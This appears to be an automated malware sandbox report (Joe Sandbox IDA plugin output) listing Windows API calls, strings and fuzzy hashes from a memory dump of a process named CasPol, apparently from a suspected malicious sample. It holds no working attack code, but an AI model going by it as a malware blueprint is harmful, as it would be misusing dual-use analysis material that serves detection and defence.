                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Item
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3888421826-0
                                                                                                                                                                                                                    • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                    • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                                                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3727323765-0
                                                                                                                                                                                                                    • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                                                    • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                                                    • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                                                    • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 764393265-0
                                                                                                                                                                                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 979780441-0
                                                                                                                                                                                                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                                                                    • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1386444988-0
                                                                                                                                                                                                                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                    • String ID: d=E
                                                                                                                                                                                                                    • API String ID: 909852535-3703654223
                                                                                                                                                                                                                    • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                                                    • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                                                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                                                      • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                                    • API String ID: 1983396471-123907689
                                                                                                                                                                                                                    • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                    • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                                                    • String ID: URL
                                                                                                                                                                                                                    • API String ID: 2108176848-3574463123
                                                                                                                                                                                                                    • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                    • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintfmemcpy
                                                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                                                    • API String ID: 2789212964-323797159
                                                                                                                                                                                                                    • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintf
                                                                                                                                                                                                                    • String ID: %%-%d.%ds
                                                                                                                                                                                                                    • API String ID: 3988819677-2008345750
                                                                                                                                                                                                                    • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                                    • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                                    • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSendmemset
                                                                                                                                                                                                                    • String ID: F^@
                                                                                                                                                                                                                    • API String ID: 568519121-3652327722
                                                                                                                                                                                                                    • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                                    • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PlacementWindowmemset
                                                                                                                                                                                                                    • String ID: WinPos
                                                                                                                                                                                                                    • API String ID: 4036792311-2823255486
                                                                                                                                                                                                                    • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@DeleteObject
                                                                                                                                                                                                                    • String ID: r!A
                                                                                                                                                                                                                    • API String ID: 1103273653-628097481
                                                                                                                                                                                                                    • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                    • String ID: _lng.ini
                                                                                                                                                                                                                    • API String ID: 383090722-1948609170
                                                                                                                                                                                                                    • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                                    • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                                                                                    • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                                    • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                                                    • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                    • free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                    • free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 726966127-0
                                                                                                                                                                                                                    • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                                                                                                                    • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                                    • free.MSVCRT ref: 0040B201
                                                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                    • free.MSVCRT ref: 0040B224
